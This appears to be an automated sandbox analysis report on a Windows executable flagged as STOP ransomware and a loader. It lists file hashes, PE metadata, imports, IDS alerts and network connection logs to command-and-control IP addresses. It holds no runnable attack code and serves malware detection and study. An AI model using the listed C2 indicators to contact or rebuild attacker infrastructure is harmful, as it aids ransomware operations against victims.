                                                                                                      SHA-512:CFED674F9A30DA63B0633A28DBAA61DB84BE66F2BA5BDEBCCA9E5C8115810A65C36C50DB21474B8F4968965DAE7AAB6B3DA1D6A177FE05839E04C4A3B01FDE31
                                                                                                      Malicious:true
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS-DOS executable
                                                                                                      Category:dropped
                                                                                                      Size (bytes):42164934
                                                                                                      Entropy (8bit):7.947664208211041
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:786432:MwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:pQcWxDMPnN+dk65gGUjku4vNjLjN
                                                                                                      MD5:51C72752E0D249F40F9109F6C135BAD0
                                                                                                      SHA1:F2D140BE91672A8BA77EEA7B03F32B4C306ABD79
                                                                                                      SHA-256:6207AD0AC7C0050B0121880CA8D99B0F72187406BC9526F7DBB8F038CFD2C240
                                                                                                      SHA-512:ED2519D59FABB5961C6D1EC66BBD179AA724409522908EB8CF6CD15210AEA8BFF3105EBE0A18E0147E5E821DEDC4B3337774477AEF039E2FA0CB77843D7F3307
                                                                                                      Malicious:true
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1031
                                                                                                      Entropy (8bit):7.819745065617026
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tt0qMzjziE+vAgmu/uZ1qGaqxXvfnIOpqftwrZOYcURTYqv6bD:sJiE+4jRZ1qGTffpqiZOSYqwD
                                                                                                      MD5:AA5B2FDE528B886E7DA33821E654A0B6
                                                                                                      SHA1:7293A645F32C4A35A4667EAF3D198291F485122E
                                                                                                      SHA-256:EE69F73414FA66CA33DEFB95EE2FFDDD94161F70A4278F152F588CD17D39090D
                                                                                                      SHA-512:53E76E7496F7CBCFE512556036A18B1733C599E74389E208290A949FFD90D58F3B146C3F713D4EED7F4F3ECE85DBBC408DD8B8D90EBF84BB55242065AFB86B16
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.96522097165237
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:t8OKlfFC5iBopuob3g47nyVA1/nyp41PYlJat9C/7Mz+rog6RRJ3XSR7vsolX1:UA5mYB3hnR1a6J9Pqr2CRbsoll
                                                                                                      MD5:FF7E7D9E95AC00974560A56E99EC2440
                                                                                                      SHA1:6A7573C847A5634B729A09628DA43998A3F3FA95
                                                                                                      SHA-256:2CAABE0652DFF40246540C4B11DBD2C078FA1C474267261444B22383F97AAD28
                                                                                                      SHA-512:043EE837D90BC33B6D4AF1D2CE1A500F553E8B184C58FAE5C53531B4F27B44A0B620A45CCA3FFF140101EE420AFD25A6E0987CB03571E7F499B51389221EFAE8
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.97079851612105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:lcOAGTLhHExJWClpRA6Z6rtRLIzlGD89HAONqz9OEHirwRK3gng9bXYiXipml:GtGH1ExbSzLUlGDDDzCgngRNXiq
                                                                                                      MD5:2FE1992B98832168C2425722298AF2B3
                                                                                                      SHA1:18603A830BD6D328D302E04A654C083224A10515
                                                                                                      SHA-256:4F3A48091480D481416B4EB28C2DC4DB837D24D080A7347C91A224CA8F22201A
                                                                                                      SHA-512:D0F9376C4F4E49FB35076BADA0CEDDA510F6F203A30DC9F33C8F9493820127E98D6C9EF085326B148F3F2D1B20BB55211BD81FC2BEDBAD8F7BD033308FFA9E59
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.968798865368675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bfusW59sbJeqa/Daf+5AHvJJshxdQkES0YEax4ETpVA4blELi/v4Kz7mM0En2roh:bf1fJeZ/DaW5gxJshn3+axhbOL2v4Qaw
                                                                                                      MD5:940A6134C3005AA0901C902300A5B9AE
                                                                                                      SHA1:0F94B2234CA2451C9B75FF090CE35B5FCF0468C0
                                                                                                      SHA-256:B463F80443E570E52B38B48ABB7F34AAC3B0598A7DDC8A6C3F8EE3B1B299BF58
                                                                                                      SHA-512:652706134F228A4B07AC7AB5CE98FF45858F36D337F624283107BBCA76252C0D69201FD371607FCF8D1A1858FC10BAEC74CA2FAF569BE6EF693D4AFFFF3FF22B
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.972905770995576
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:WU+TuDpkmSlO6l2vGrrilGOnN1+DAoNyP0Sy1vauM6EKEev0cN6YL33mflueH5bZ:WUSSSdlbkFkAOo9Ee6pEe0cf2FZbFE2b
                                                                                                      MD5:61B7398F64670F01E2B0F6F794D8EBAF
                                                                                                      SHA1:E8289140331CFCF7BBA4282D0F9E59D2EA187251
                                                                                                      SHA-256:4443561282EEE5397F8F0F75D0EC9366BB4FC0DCD491E7B0ECC8ACA884D6CF06
                                                                                                      SHA-512:15E31A768DC80ACA8E398178426D63B17F742D1D68212CB3C17BF1625346E10DC10FB0AE7935A0BC87BDAD76A8167566DA57F041500A4A2863CE3A27D86889F8
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1243
                                                                                                      Entropy (8bit):7.841911840574799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:voK0Q0TOhOo2WDI9QOkwo833TWSHunsCQw7sSja4kQ4sFU1v6bD:gQ4o2Wc9Qm3HTWpntQw7sKz/OwD
                                                                                                      MD5:817929634A5EF9FBB79AF8DB46C63FEB
                                                                                                      SHA1:8E652758B34C08D04B35E098E3EDCE2F57453A04
                                                                                                      SHA-256:25E653F3E44E79EC1ABBB053F149EF812CDBED22B678E66F7D227A96F419D555
                                                                                                      SHA-512:F628EC695700D7FBB71FFEB2A1B33732E341B739186F7D1460493DB5DED3ABD27C661D0F114C3698178F6656655877EDC86A2771BF1D504702500D3330987687
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1835008
                                                                                                      Entropy (8bit):4.462958955748469
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:8IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:BXD94+WlLZMM6YFHg+n
                                                                                                      MD5:82058D337F09C957DC402B785BBACA29
                                                                                                      SHA1:1AFD382A7CCE62B8F0B172C5A307F91A4D8B1970
                                                                                                      SHA-256:FE83F337DC17D32DF6A0305E652AACC9C104FCE9B8C57CAFED525F45B1516472
                                                                                                      SHA-512:8D81520058B607DC54F5B8793ACCDC5885B3D43880C706CF7362F1D8AC34B55821B14BC67987ECE8106EC3888CA92512ABA01B82BF28E0DEE443776134F956CE
                                                                                                      Malicious:false
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.657221882859457
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5:1aab5a9252e93871932cd7381693e199
                                                                                                      SHA1:3b1ee795bc70733d1820a48d2ee4e2641b124ce1
                                                                                                      SHA256:88968c3b8e6e3fce9e327cb0d92079b88a35962f0503edc0888d2d9883de87c6
                                                                                                      SHA512:f0df681492502f7986ce469557575dba532a02af562d8eb0fcf758274f0a511442ce25dcd68ba9f812d63029ff6051b3c5114a543d156344ef9fa7eaaaa1c6b6
                                                                                                      SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8sWQHUq7:F0dwAYZt6C31WeTVRPOhs7Uq7
                                                                                                      TLSH:AB35AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x424141
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:1
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:1
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:1
                                                                                                      Import Hash:0c756c849bc7b459f78f7a5ce46cd4a7
                                                                                                      Instruction
                                                                                                      call 00007F5ADC9BE5F2h
                                                                                                      jmp 00007F5ADC9B02EEh
                                                                                                      jmp 00007F5ADC9B060Ch
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push dword ptr [ebp+18h]
                                                                                                      push dword ptr [ebp+14h]
                                                                                                      push dword ptr [ebp+10h]
                                                                                                      push dword ptr [ebp+0Ch]
                                                                                                      push dword ptr [ebp+08h]
                                                                                                      call 00007F5ADC9B064Bh
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 00000328h
                                                                                                      mov eax, dword ptr [0050AD20h]
                                                                                                      xor eax, ebp
                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                      cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                      push edi
                                                                                                      je 00007F5ADC9B04BBh
                                                                                                      push dword ptr [ebp+08h]
                                                                                                      call 00007F5ADC9BED94h
                                                                                                      pop ecx
                                                                                                      and dword ptr [ebp-00000320h], 00000000h
                                                                                                      lea eax, dword ptr [ebp-0000031Ch]
                                                                                                      push 0000004Ch
                                                                                                      push 00000000h
                                                                                                      push eax
                                                                                                      call 00007F5ADC9B7733h
                                                                                                      lea eax, dword ptr [ebp-00000320h]
                                                                                                      add esp, 0Ch
                                                                                                      mov dword ptr [ebp-00000328h], eax
                                                                                                      lea eax, dword ptr [ebp-000002D0h]
                                                                                                      mov dword ptr [ebp-00000324h], eax
                                                                                                      mov dword ptr [ebp-00000220h], eax
                                                                                                      mov dword ptr [ebp-00000224h], ecx
                                                                                                      mov dword ptr [ebp-00000228h], edx
                                                                                                      mov dword ptr [ebp-0000022Ch], ebx
                                                                                                      mov dword ptr [ebp-00000230h], esi
                                                                                                      mov dword ptr [ebp-00000234h], edi
                                                                                                      mov word ptr [ebp-00000208h], ss
                                                                                                      mov word ptr [ebp-00000214h], cs
                                                                                                      mov word ptr [ebp-00000238h], ds
                                                                                                      mov word ptr [ebp-0000023Ch], es
                                                                                                      mov word ptr [ebp-00000240h], fs
                                                                                                      mov word ptr [ebp+0000FDBCh], gs
                                                                                                      Programming Language:
                                                                                                      • [ASM] VS2013 UPD5 build 40629
                                                                                                      • [ C ] VS2013 UPD5 build 40629
                                                                                                      • [C++] VS2013 build 21005
                                                                                                      • [ASM] VS2013 build 21005
                                                                                                      • [ C ] VS2013 build 21005
                                                                                                      • [RES] VS2013 build 21005
                                                                                                      • [LNK] VS2013 UPD5 build 40629
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1085d0         0x154         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x12b000         0x1e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x12c000         0xa32c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xcc460          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x105ac8         0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xcc000          0x3f0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0xca5bc       0xca600   9d3505098e4eee3dc361c6bef0b26b98  False     0.5030461029184682  data       6.570129941575212   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0xcc000          0x3dba2       0x3dc00   7f270d34c464ae3d5aabd9eb0f21ffe1  False     0.3957845711032389  data       5.668469619748889   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x10a000         0x20358       0x6400    b9cff45acba0bf73d16290994acd3da3  False     0.4978125           data       4.939624310736174   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x12b000         0x1e0         0x200     9c3280f335e8e346ce925599d24fcc62  False     0.533203125         data       4.7176788329467545  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x12c000         0xa32c        0xa400    24f3bb349067df95682b9a6026a53082  False     0.6199980945121951  data       6.612523450234696   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                      Language  Country        ZLIB Complexity
RT_MANIFEST  0x12b060  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5931758530183727
DLL           Import
RPCRT4.dll    RpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA
MPR.dll       WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
WININET.dll   InternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA
WINMM.dll     timeGetTime
SHLWAPI.dll   PathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW
KERNEL32.dll  VirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId
USER32.dll    PeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage
ADVAPI32.dll  RegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam
SHELL32.dll   SHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA
ole32.dll     CoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance
OLEAUT32.dll  SysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString
IPHLPAPI.DLL  GetAdaptersInfo
WS2_32.dll    inet_ntoa, inet_addr, gethostbyname
DNSAPI.dll    DnsFree, DnsQuery_W
CRYPT32.dll   CryptStringToBinaryA
GDI32.dll     DeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap
Language of compilation system  Country where language is spoken
English                         United States
Timestamp                 Protocol  SID      Message                                                       Source Port  Dest Port  Source IP    Dest IP
02/12/24-01:36:15.166464  TCP       2833438  ETPRO TROJAN STOP Ransomware CnC Activity                     49734        80         192.168.2.4  199.59.242.150
02/12/24-01:35:56.488809  TCP       2020826  ET TROJAN Potential Dridex.Maldoc Minimal Executable Request  49732        80         192.168.2.4  199.59.242.150
02/12/24-01:35:56.488809  TCP       2036333  ET TROJAN Win32/Vodkagats Loader Requesting Payload           49732        80         192.168.2.4  199.59.242.150
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                      Feb 12, 2024 01:35:58.166184902 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.283370018 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.283482075 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.283723116 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.400743008 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402215004 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402254105 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402290106 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402306080 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.402306080 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.402370930 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.604569912 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.722901106 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:01.722963095 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:01.722989082 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.723001003 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:01.723058939 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.723058939 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:03.479585886 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:03.598073959 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:03.598182917 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:03.598205090 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:03.598400116 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.791857958 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.910274982 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:06.910336018 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:06.910376072 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:06.910615921 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.910615921 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.910617113 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:09.784647942 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:09.784744024 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:09.784837008 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:09.803900957 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:09.803941965 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:09.965564013 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.059803963 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.059887886 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.064039946 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.064059019 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.064559937 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.064635038 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.066363096 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.084898949 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.084955931 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.084992886 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.084999084 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.084999084 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.085052967 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.113904953 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639273882 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639359951 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.639403105 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639460087 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.639472961 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639517069 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.639530897 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639592886 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.640736103 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.640763998 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:11.944216967 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:12.062108040 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:12.062120914 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:12.062130928 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:12.062176943 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:12.062176943 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:15.166464090 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:15.284982920 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:15.285053015 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:15.285073996 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:15.285355091 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:16.297498941 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.297528028 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.297621012 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.306591034 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.306605101 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.560812950 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.560906887 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.568059921 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.568068981 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.568696022 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.568806887 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.570950031 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.604013920 CET8049732199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.604093075 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:16.617901087 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146042109 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146102905 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146125078 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146162987 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146167994 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146207094 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146213055 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146249056 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146266937 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146312952 CET49742443192.168.2.4104.21.65.24
